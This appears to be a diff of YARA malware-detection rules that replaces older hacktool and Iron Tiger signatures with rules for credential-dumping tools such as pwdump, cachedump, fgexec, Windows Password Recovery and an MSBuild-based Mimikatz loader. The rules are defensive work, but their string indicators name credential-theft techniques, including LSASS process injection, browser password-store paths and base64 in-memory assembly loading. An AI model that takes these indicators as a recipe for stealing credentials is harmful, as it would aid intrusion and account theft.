-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Hscan_V1_20_Hscan : FILE
+rule SIGNATURE_BASE_Servpw : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file hscan.exe"
+		description = "Detects a tool used by APT groups - file servpw.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4183824c-b77f-5500-a962-8d9dc78a9388"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2457-L2474"
+		id = "48b9dae1-16b3-563c-ac4e-b71f3a86b38a"
+		date = "2016-09-08"
+		modified = "2025-04-14"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3325-L3344"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "568b06696ea0270ee1a744a5ac16418c8dacde1c"
-		logic_hash = "8e30c366c5d5c34a7b50ba4dec17a46c173196b773fff6965891802bcebeb112"
+		logic_hash = "150466c23ea7aa20f6e60c592ab6bd2f42e3a48a65a6665b89a9f19fa61aae8f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "97b39ac28794a7610ed83ad65e28c605397ea7be878109c35228c126d43e2f46"
+		hash2 = "0f340b471ef34c69f5413540acd3095c829ffc4df38764e703345eb5e5020301"
 
 	strings:
-		$s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii
-		$s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100" fullword ascii
-		$s3 = ".\\report\\%s-%s.html" fullword ascii
-		$s4 = ".\\log\\Hscan.log" fullword ascii
-		$s5 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii
+		$s1 = "Unable to open target process: %d, pid %d" fullword ascii
+		$s2 = "LSASS.EXE" fullword wide
+		$s3 = "WriteProcessMemory failed: %d" fullword ascii
+		$s4 = "lsremora64.dll" fullword ascii
+		$s5 = "CreateRemoteThread failed: %d" fullword ascii
+		$s6 = "Thread code: %d, path: %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE__Project1_Generate_Rejoice : FILE
+rule SIGNATURE_BASE_Fgexec : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - from files Project1.exe, Generate.exe, rejoice.exe"
+		description = "Detects a tool used by APT groups - file fgexec.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4b36d450-1194-527c-8565-7f321d486d01"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2476-L2497"
+		id = "8ffe47b9-81a8-5eb4-b46f-db9d23682de4"
+		date = "2016-09-08"
+		modified = "2025-04-14"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3346-L3362"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b66bb4d392881468b33a8ee4458f33bfe7a82d34cc3927eedccd54ad94ff6a04"
+		logic_hash = "3672255d7829520aa8ca792519f645b86fe4244a16652a960375f23baa7d32b3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"
-		hash1 = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
-		hash2 = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
+		hash1 = "8697897bee415f213ce7bc24f22c14002d660b8aaffab807490ddbf4f3f20249"
 
 	strings:
-		$s1 = "sfUserAppDataRoaming" fullword ascii
-		$s2 = "$TRzFrameControllerPropertyConnection" fullword ascii
-		$s3 = "delphi32.exe" fullword ascii
-		$s4 = "hkeyCurrentUser" fullword ascii
-		$s5 = "%s is not a valid IP address." fullword wide
-		$s6 = "Citadel hooking error" fullword ascii
+		$x1 = "\\Release\\fgexec.pdb" ascii
+		$x2 = "fgexec Remote Process Execution Tool" fullword ascii
+		$x3 = "fgexec CallNamedPipe failed" fullword ascii
+		$x4 = "fizzgig and the mighty foofus.net team" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE__Hscan_Hscan_Hscangui : FILE
+rule SIGNATURE_BASE_Cachedump : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - from files hscan.exe, hscan.exe, hscangui.exe"
+		description = "Detects a tool used by APT groups - from files cachedump.exe, cachedump64.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "174b0ee4-23ce-59fd-a784-ab58fd13ce67"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2499-L2519"
+		id = "ebcaeb73-d2df-5a4c-9f50-b4a01293b88b"
+		date = "2016-09-08"
+		modified = "2025-04-14"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3364-L3384"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5466c3dd8b2b777186bfab9d0948905eb3692ce05cf4748fb5b7b896dc3cb251"
+		logic_hash = "7e4d710ed9dab12114e87fa33abe6db6245c780b31bcd94fbd21e75aaa355ca8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash0 = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"
-		hash1 = "568b06696ea0270ee1a744a5ac16418c8dacde1c"
-		hash2 = "af8aced0a78e1181f4c307c78402481a589f8d07"
+		hash1 = "cf58ca5bf8c4f87bb67e6a4e1fb9e8bada50157dacbd08a92a4a779e40d569c4"
+		hash2 = "e38edac8c838a043d0d9d28c71a96fe8f7b7f61c5edf69f1ce0c13e141be281f"
 
 	strings:
-		$s1 = ".\\log\\Hscan.log" fullword ascii
-		$s2 = ".\\report\\%s-%s.html" fullword ascii
-		$s3 = "[%s]: checking \"FTP account: ftp/ftp@ftp.net\" ..." fullword ascii
-		$s4 = "[%s]: IPC NULL session connection success !!!" fullword ascii
-		$s5 = "Scan %d targets,use %4.1f minutes" fullword ascii
+		$s1 = "Failed to open key SECURITY\\Cache in RegOpenKeyEx. Is service running as SYSTEM ? Do you ever log on domain ? " fullword ascii
+		$s2 = "Unable to open LSASS.EXE process" fullword ascii
+		$s3 = "Service not found. Installing CacheDump Service (%s)" fullword ascii
+		$s4 = "CacheDump service successfully installed." fullword ascii
+		$s5 = "Kill CacheDump service (shouldn't be used)" fullword ascii
+		$s6 = "cacheDump [-v | -vv | -K]" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 240KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Kiwi_Tools : FILE
+rule SIGNATURE_BASE_Pwdump_B : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set"
+		description = "Detects a tool used by APT groups - file PwDump.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "000f0081-b035-5c73-8da2-addde2b55303"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2521-L2554"
+		id = "aad974f1-76bf-5aae-8376-a4fd3f27b345"
+		date = "2016-09-08"
+		modified = "2025-04-14"
+		reference = "http://goo.gl/igxLyF"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3386-L3406"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ce7b3c7d57740257013d9d589444a3b53e81254619bd3f09ece917c70bba03ce"
+		logic_hash = "d50ad359b9433439cddda9408d227f35ee8de3280ad24f42c5e6ef1e6a1526bd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"
-		hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
-		hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
-		hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
-		hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"
-		hash5 = "7addce4434670927c4efaa560524680ba2871d17"
-		hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"
-		hash7 = "b5c93489a1b62181594d0fb08cc510d947353bc8"
-		hash8 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
-		hash9 = "5d578df9a71670aa832d1cd63379e6162564fb6b"
-		hash10 = "febadc01a64a071816eac61a85418711debaf233"
-		hash11 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
-		hash12 = "56a61c808b311e2225849d195bbeb69733efe49a"
-		hash13 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
-		hash14 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
-		hash15 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"
-		hash16 = "20facf1fa2d87cccf177403ca1a7852128a9a0ab"
-		hash17 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"
+		hash1 = "3c796092f42a948018c3954f837b4047899105845019fce75a6e82bc99317982"
 
 	strings:
-		$s1 = "http://blog.gentilkiwi.com/mimikatz" ascii
-		$s2 = "Benjamin Delpy" fullword ascii
-		$s3 = "GlobalSign" fullword ascii
+		$x1 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineName" fullword ascii
+		$x2 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword ascii
+		$x3 = "where -x targets a 64-bit host" fullword ascii
+		$x4 = "Couldn't delete target executable from remote machine: %d" fullword ascii
+		$s1 = "lsremora64.dll" fullword ascii
+		$s2 = "lsremora.dll" fullword ascii
+		$s3 = "servpw.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Kiwi_Tools_Gentil_Kiwi : FILE
+rule SIGNATURE_BASE_Msbuild_Mimikatz_Execution_Via_XML
 {
 	meta:
-		description = "Chinese Hacktool Set"
+		description = "Detects an XML that executes Mimikatz on an endpoint via MSBuild"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4ad54580-b10b-5b17-8d8a-510e210e04d1"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2556-L2587"
+		id = "98aa68b9-6de4-5353-8d87-9e974529c044"
+		date = "2016-10-07"
+		modified = "2025-04-14"
+		reference = "https://gist.github.com/subTee/c98f7d005683e616560bda3286b6a0d8#file-katz-xml"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3417-L3436"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1a88bb31e985ae2119b578494ce9130204b41eece5929865c0822cdc82eaba75"
+		logic_hash = "f926a2d5ab987b97c6ed2a89c69eac5549d8b7885bdbf75ce40e05e6ce6cfa7a"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"
-		hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
-		hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
-		hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
-		hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"
-		hash5 = "7addce4434670927c4efaa560524680ba2871d17"
-		hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"
-		hash7 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
-		hash8 = "5d578df9a71670aa832d1cd63379e6162564fb6b"
-		hash9 = "febadc01a64a071816eac61a85418711debaf233"
-		hash10 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
-		hash11 = "56a61c808b311e2225849d195bbeb69733efe49a"
-		hash12 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
-		hash13 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
-		hash14 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"
-		hash15 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"
 
 	strings:
-		$s1 = "mimikatz" fullword wide
-		$s2 = "Copyright (C) 2012 Gentil Kiwi" fullword wide
-		$s3 = "Gentil Kiwi" fullword wide
+		$x1 = "<Project ToolsVersion=" ascii
+		$x2 = "</SharpLauncher>" fullword ascii
+		$s1 = "\"TVqQAAMAAAA" ascii
+		$s2 = "System.Convert.FromBase64String(" ascii
+		$s3 = ".Invoke(" ascii
+		$s4 = "Assembly.Load(" ascii
+		$s5 = ".CreateInstance(" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Credentialstealer_Generic_Backdoor : FILE
+rule SIGNATURE_BASE_Fscan_Portscanner : FILE
 {
 	meta:
-		description = "Detects credential stealer byed on many strings that indicate password store access"
+		description = "Fscan port scanner scan output / strings"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b3124f6c-4e18-562c-84d9-d51e086da446"
-		date = "2017-06-07"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_credstealer_generic.yar#L2-L24"
+		id = "400383dc-8bc0-5e77-a3f3-d6ba9f4c3c0f"
+		date = "2017-01-06"
+		modified = "2025-04-14"
+		reference = "https://twitter.com/JamesHabben/status/817112447970480128"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3447-L3461"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "aa06291a91ac84f80cd2cbe5a01c2cbcc14cf6914da9d1234af9b3d833990551"
+		logic_hash = "35770f040da0b14fe4492a44383e332c9912bd89943838627491196ce8f0ec37"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "edb2d039a57181acf95bd91b2a20bd9f1d66f3ece18506d4ad870ab65e568f2c"
 
 	strings:
-		$s1 = "GetOperaLoginData" fullword ascii
-		$s2 = "GetInternetExplorerCredentialsPasswords" fullword ascii
-		$s3 = "%s\\Opera Software\\Opera Stable\\Login Data" fullword ascii
-		$s4 = "select *  from moz_logins" fullword ascii
-		$s5 = "%s\\Google\\Chrome\\User Data\\Default\\Login Data" fullword ascii
-		$s6 = "Host.dll.Windows" fullword ascii
-		$s7 = "GetInternetExplorerVaultPasswords" fullword ascii
-		$s8 = "GetWindowsLiveMessengerPasswords" fullword ascii
-		$s9 = "%s\\Chromium\\User Data\\Default\\Login Data" fullword ascii
-		$s10 = "%s\\Opera\\Opera\\profile\\wand.dat" fullword ascii
+		$s1 = "Time taken:" fullword ascii
+		$s2 = "Scan finished at" fullword ascii
+		$s3 = "Scan started at" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 4 of them )
+		filesize < 20KB and 3 of them
 }
-
-rule SIGNATURE_BASE_SUSP_Unsigned_Googleupdate : FILE
+rule SIGNATURE_BASE_WPR_Loader_EXE : FILE
 {
 	meta:
-		description = "Detects suspicious unsigned GoogleUpdate.exe"
+		description = "Windows Password Recovery - file loader.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2575b882-3526-5c42-9d50-83fb0b7df3f5"
-		date = "2019-08-05"
-		modified = "2023-12-05"
+		id = "97fa3efb-9e7a-52ef-9e26-3fdd573d4d30"
+		date = "2017-03-15"
+		modified = "2025-04-14"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_google_anomaly.yar#L3-L22"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3473-L3493"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5e333ac773927e2ed1f6aa4d6bbcb63d67bcc8d18d732a84bb68cb503469b247"
-		score = 60
+		logic_hash = "26af6fe1b3dfe8e3a48c03a9f6f2033fbc909a677d35159e28b7e9b867ea5542"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e7d158d27d9c14a4f15a52ee5bf8aa411b35ad510b1b93f5e163ae7819c621e2"
 
 	strings:
-		$ac1 = { 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C
-               00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65
-               00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55
-               00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78
-               00 65 }
+		$s1 = "Failed to get system process ID" fullword wide
+		$s2 = "gLSASS.EXE" fullword wide
+		$s3 = "WriteProcessMemory failed" fullword wide
+		$s4 = "wow64 process NOT created" fullword wide
+		$s5 = "\\ast.exe" wide
+		$s6 = "Exit code=%s, status=%d" fullword wide
+		$s7 = "VirtualProtect failed" fullword wide
+		$s8 = "nSeDebugPrivilege" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and $ac1 and pe.number_of_signatures < 1
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them )
 }
-rule SIGNATURE_BASE_Irontiger_Aspxspy : HIGHVOL
+rule SIGNATURE_BASE_WPR_Loader_DLL : FILE
 {
 	meta:
-		description = "ASPXSpy detection. It might be used by other fraudsters"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "3010fcb9-0dbf-59ef-90ce-01d922a95f2d"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L1-L13"
+		description = "Windows Password Recovery - file loader64.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d3102ab6-0473-544b-b9dd-ec7a18ae1c4b"
+		date = "2017-03-15"
+		modified = "2025-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3495-L3528"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6b5830d3fd6aa346b27788cd4abd581b4724fecc4e880b14dd7b1dd27ef1eea3"
+		logic_hash = "015334828007e954d1e910e6377b37bade99df2ce86152901ec4ded8c71975de"
 		score = 75
 		quality = 85
-		tags = "HIGHVOL"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7b074cb99d45fc258e0324759ee970467e0f325e5d72c0b046c4142edc6776f6"
+		hash2 = "a1f27f7fd0e03601a11b66d17cfacb202eacf34f94de3c4e9d9d39ea8d1a2612"
 
 	strings:
-		$str2 = "IIS Spy" wide ascii
-		$str3 = "protected void DGCoW(object sender,EventArgs e)" wide ascii
+		$x1 = "loader64.dll" fullword ascii
+		$x2 = "loader.dll" fullword ascii
+		$s1 = "TUlDUk9TT0ZUX0FVVEhFTlRJQ0FUSU9OX1BBQ0tBR0VfVjFfMA==" fullword ascii
+		$s2 = "UmVtb3RlRGVza3RvcEhlbHBBc3Npc3RhbnRBY2NvdW50" fullword ascii
+		$s3 = "U2FtSVJldHJpZXZlUHJpbWFyeUNyZWRlbnRpYWxz" fullword ascii
+		$s4 = "VFM6SW50ZXJuZXRDb25uZWN0b3JQc3dk" fullword ascii
+		$s5 = "TCRVRUFjdG9yQWx0Q3JlZFByaXZhdGVLZXk=" fullword ascii
+		$s6 = "YXNwbmV0X1dQX1BBU1NXT1JE" fullword ascii
+		$s7 = "TCRBTk1fQ1JFREVOVElBTFM=" fullword ascii
+		$s8 = "RGVmYXVsdFBhc3N3b3Jk" fullword ascii
+		$op0 = { 48 8b cd e8 e0 e8 ff ff 48 89 07 48 85 c0 74 72 }
+		$op1 = { e8 ba 23 00 00 33 c9 ff 15 3e 82 }
+		$op2 = { 48 83 c4 28 e9 bc 55 ff ff 48 8d 0d 4d a7 00 00 }
 
 	condition:
-		any of ( $str* )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or ( 1 of ( $s* ) and all of ( $op* ) ) )
 }
-rule SIGNATURE_BASE_Irontiger_Changeport_Toolkit_Driversinstall : FILE
+rule SIGNATURE_BASE_WPR_Passscape_Loader : FILE
 {
 	meta:
-		description = "Iron Tiger Malware - Changeport Toolkit driverinstall"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "fde2728b-9a23-5f35-9727-0834a7b403da"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L15-L29"
+		description = "Windows Password Recovery - file ast.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d8e224ce-edd2-5e2d-9b6e-a8995f5d2c1c"
+		date = "2017-03-15"
+		modified = "2025-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3530-L3548"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2ae32596da4f98a0ec2556c2cd87fc7a0f85c37ce96c7163664f2e8cc3ec498d"
+		logic_hash = "79b1a3ed1ea0d9a3ddee0b8557393318a8baf4812110a6ed03a7106b8096b31e"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f6f2d4b9f19f9311ec419f05224a1c17cf2449f2027cb7738294479eea56e9cb"
 
 	strings:
-		$str1 = "openmydoor" wide ascii
-		$str2 = "Install service error" wide ascii
-		$str3 = "start remove service" wide ascii
-		$str4 = "NdisVersion" wide ascii
+		$s1 = "SYSTEM\\CurrentControlSet\\Services\\PasscapeLoader64" fullword wide
+		$s2 = "ast64.dll" fullword ascii
+		$s3 = "\\loader64.exe" wide
+		$s4 = "Passcape 64-bit Loader Service" fullword wide
+		$s5 = "PasscapeLoader64" fullword wide
+		$s6 = "ast64 {msg1GkjN7Sh8sg2Al7ker63f}" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $str* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_Irontiger_Changeport_Toolkit_Changeportexe : FILE
+rule SIGNATURE_BASE_WPR_Asterisk_Hook_Library : FILE
 {
 	meta:
-		description = "Iron Tiger Malware - Toolkit ChangePort"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "2ba74413-5f72-560a-8567-1c4bf3357097"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L31-L46"
+		description = "Windows Password Recovery - file ast64.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "03c20c9d-bb8f-53f6-9cb5-9b059fb24949"
+		date = "2017-03-15"
+		modified = "2025-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3550-L3572"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b5a5a1cff372d97bfa281d297b6230279cd1526c5df636efe4dec3aa3d923edf"
+		logic_hash = "6bb75cb8c3ba18a34f4651532060154608c78e6f748148226da4416ad1171124"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "225071140e170a46da0e57ce51f0838f4be00c8f14e9922c6123bee4dffde743"
+		hash2 = "95ec84dc709af990073495082d30309c42d175c40bd65cad267e6f103852a02d"
 
 	strings:
-		$str1 = "Unable to alloc the adapter!" wide ascii
-		$str2 = "Wait for master fuck" wide ascii
-		$str3 = "xx.exe <HOST> <PORT>" wide ascii
-		$str4 = "chkroot2007" wide ascii
-		$str5 = "Door is bind on %s" wide ascii
+		$s1 = "ast64.dll" fullword ascii
+		$s2 = "ast.dll" fullword wide
+		$s3 = "c:\\%s.lvc" fullword ascii
+		$s4 = "c:\\%d.lvc" fullword ascii
+		$s5 = "Asterisk Hook Library" fullword wide
+		$s6 = "?Ast_StartRd64@@YAXXZ" fullword ascii
+		$s7 = "Global\\{1374821A-281B-9AF4-%04X-12345678901234}" fullword ascii
+		$s8 = "2004-2013 Passcape Software" fullword wide
+		$s9 = "Global\\Passcape#6712%04X" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $str* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
 }
-rule SIGNATURE_BASE_Irontiger_Dllshellexc2010 : FILE
+rule SIGNATURE_BASE_WPR_Windowspasswordrecovery_EXE : FILE
 {
 	meta:
-		description = "dllshellexc2010 Exchange backdoor + remote shell"
-		author = "Cyber Safety Solutions, Trend Micro"
-		id = "960e8e5c-65a5-5dd2-90fa-1f7d31ee8cb5"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/T5fSJC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger_trendmicro.yar#L48-L63"
+		description = "Windows Password Recovery - file wpr.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7fa2062c-75dd-55aa-8775-631a9c1a497e"
+		date = "2017-03-15"
+		modified = "2025-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3574-L3603"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b75477f01627ac05013c5e4ccb1d58a6bb25bfbe83ad0cec392140d44637a028"
+		logic_hash = "0f2995a8ba1644d384167221560aa0c3f074e8e2cf2b79bbb06537fcaed2df7f"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c1c64cba5c8e14a1ab8e9dd28828d036581584e66ed111455d6b4737fb807783"
 
 	strings:
-		$str1 = "Microsoft.Exchange.Clients.Auth.dll" ascii wide
-		$str2 = "Dllshellexc2010" wide ascii
-		$str3 = "Users\\ljw\\Documents" wide ascii
-		$bla1 = "please input path" wide ascii
-		$bla2 = "auth.owa" wide ascii
+		$x1 = "UuPipe" fullword ascii
+		$x2 = "dbadllgl" fullword ascii
+		$x3 = "UkVHSVNUUlkgTU9O" fullword ascii
